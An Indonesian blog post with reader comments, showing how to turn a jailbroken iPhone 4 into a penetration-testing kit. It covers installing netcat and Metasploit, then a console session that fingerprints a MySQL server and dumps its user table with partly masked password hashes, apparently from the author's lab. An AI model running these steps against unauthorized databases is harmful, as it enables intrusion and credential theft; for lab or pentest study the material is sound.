Iphone4: Network hacking arsenal in your pocket!
Sementara banyak para 4l4y3rs yang hanya menggunakan hi-tech phone-nya untuk keperluan gaya, gaul dan agak gayus (sedikit dipaksain dan agak ga nyambung), kali saya ingin memperlihatkan penggunaan Iphone untuk keperluan yang jauh lebih berguna yaitu penetration testing.
Setelah melakukan jailbreak, silahkan install OpenSSH, sehingga anda bisa mengakses console via iSSH atau ssh client lainnya.
Elz:/ root# uname -msi Darwin iPhone3,1 N90AP Elz:/ root# ifconfig lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384 inet 127.0.0.1 netmask 0xff000000 pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450 inet 10.xx.xx.xx --> 10.xx.xx.xx netmask 0xffffffff pdp_ip1: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024 pdp_ip2: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024 pdp_ip3: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024 en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500 inet 172.16.0.30 netmask 0xfffffe00 broadcast 172.16.1.255 ether 40:a6:d9:7f:d3:35 en1: flags=8822<BROADCAST,SMART,SIMPLEX,MULTICAST> mtu 1500 ether 40:a6:d9:7f:d3:38
Untuk melengkapi iphone anda dengan hacking tools yang diperlukan maka anda harus menggunakan software manager apt-get untuk menginstallnya. Installasi package manager apt-get bisa dilakukan dari Cydia, setelah sukses anda akan dengan mudah menginstall package-package yang anda butuhkan:
Elz:/ root# apt-get install netcat Reading package lists... Done Building dependency tree Reading state information... Done The following NEW packages will be installed: netcat 0 upgraded, 1 newly installed, 0 to remove and 3 not upgraded. Need to get 19.9kB of archives. After this operation, 61.4kB of additional disk space will be used. Get:1 http://apt.saurik.com tangelo-3.7/main netcat 0.7.1-2 [19.9kB] Fetched 19.9kB in 14s (1365B/s) Selecting previously deselected package netcat. (Reading database ... 5402 files and directories currently installed.) Unpacking netcat (from .../netcat_0.7.1-2_iphoneos-arm.deb) ... Setting up netcat (0.7.1-2) ...
Hampir semua tools semacam ettercap, nmap, dsniff bisa anda install dengan mudah layaknya menggunakan laptop atau pc biasa. Sedikit catatan untuk penginstallan metasploit framework3, anda disarankan untuk mengambil package ruby yang compatible dengan msf tersebut.
Elz:/var/ root# wget http://plugin.name/apt.iwatcher.net/debs/-IzQTMa9kmCdKMwOcAhkeQ/ruby_1.8.6-p111-5_iphoneos-arm.deb Elz:/var/ root# wget http://plugin.name/apt.iwatcher.net/debs/IrGPuK1_wEgo1XNN9tf68g/rubygems_1.2.0-3_iphoneos-arm.deb Elz:/var/ root# dpkg -i ruby_1.8.6-p111-5_iphoneos-arm.deb Elz:/var/ root# dpkg -i rubygems_1.2.0-3_iphoneos-arm.deb Elz:/var/ root# wget http://updates.metasploit.com/data/releases/framework-3.5.0.tar.bz2 Elz:/var/ root# tar jxvf framework-3.5.0.tar.bz2 Elz:/var/ root# mv framework3 msf3 Elz:/var/msf3 root# svn update Elz:/var/msf3 root# ./msfconsole | | _) | __ `__ _ __| _` | __| __ | _ | __| | | | __/ | ( |__ | | | ( | | | _| _| _|___|__|__,_|____/ .__/ _|___/ _|__| _| =[ metasploit v3.6.0-dev [core:3.6 api:1.0] + -- --=[ 636 exploits - 314 auxiliary + -- --=[ 215 payloads - 27 encoders - 8 nops =[ svn r11385 updated today (2010.12.21) msf>
So, lets test..
Elz:/var/msf3 root# ./msfconsole
____________
< metasploit >
------------
,__,
(oo)____
(__) )
||--|| *
=[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 636 exploits - 314 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r11385 updated today (2010.12.21)
msf > use auxiliary/scanner/mysql/mysql_version
msf auxiliary(mysql_version) > set RHOSTS 172.16.0.11
RHOSTS => 172.16.0.11
msf auxiliary(mysql_version) > run
[*] 172.16.0.11:3306 is running MySQL 5.0.86-log (protocol 10)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_version) > use auxiliary/admin/mysql/mysql_sql
msf auxiliary(mysql_sql) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_sql) > set SQL select user, host, password from mysql.user
SQL => select user, host, password from mysql.user
msf auxiliary(mysql_sql) > set RHOST 172.16.0.11
RHOST => 172.16.0.11
msf auxiliary(mysql_sql) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOST 172.16.0.11 yes The target address
RPORT 3306 yes The target port
SQL select user, host, password from mysql.user yes The SQL to execute.
USERNAME root no The username to authenticate as
msf auxiliary(mysql_sql) > run
[*] Sending statement: 'select user, host, password from mysql.user'...
[*] | root | localhost | |
[*] | root | lab.kecoak-elektr0nik.net | |
[*] | root | 127.0.0.1 | |
[*] | | localhost | |
[*] | | lab.kecoak-elektr0nik.net | |
[*] | alessio | % | 54830b5b500xxxxx |
[*] | logbsd | % | 54830b5b500xxxxx |
[*] | admindodol | % | 2604bebc32bxxxxx |
[*] | dudun | % | 446a12100c8xxxxx |
[*] | root | % | |
[*] Auxiliary module execution completed
msf auxiliary(mysql_sql) >
Tidak ada yang begitu spesial karena penggunaan Iphone sebagai media untuk keperluan penetration testing hampir sama dengan penggunaan laptop, cuma memang jadi jauh lebih mobile karena tidak perlu membawa laptop yang jelas lebih “vulgar”. Hampir semua tools seperti dsniff, arpspoof, ettercap, tcpdump, nmap berjalan dengan sempurna diatas mobile phone milik steve jobs ini. So, do you still love your BB? *lirik scut* 😀
2 Responses to “Iphone4: Network hacking arsenal in your pocket!”
Leave a Reply
gmana dgan android?
gimana dengan windows phone mas bro? windows phone 8.1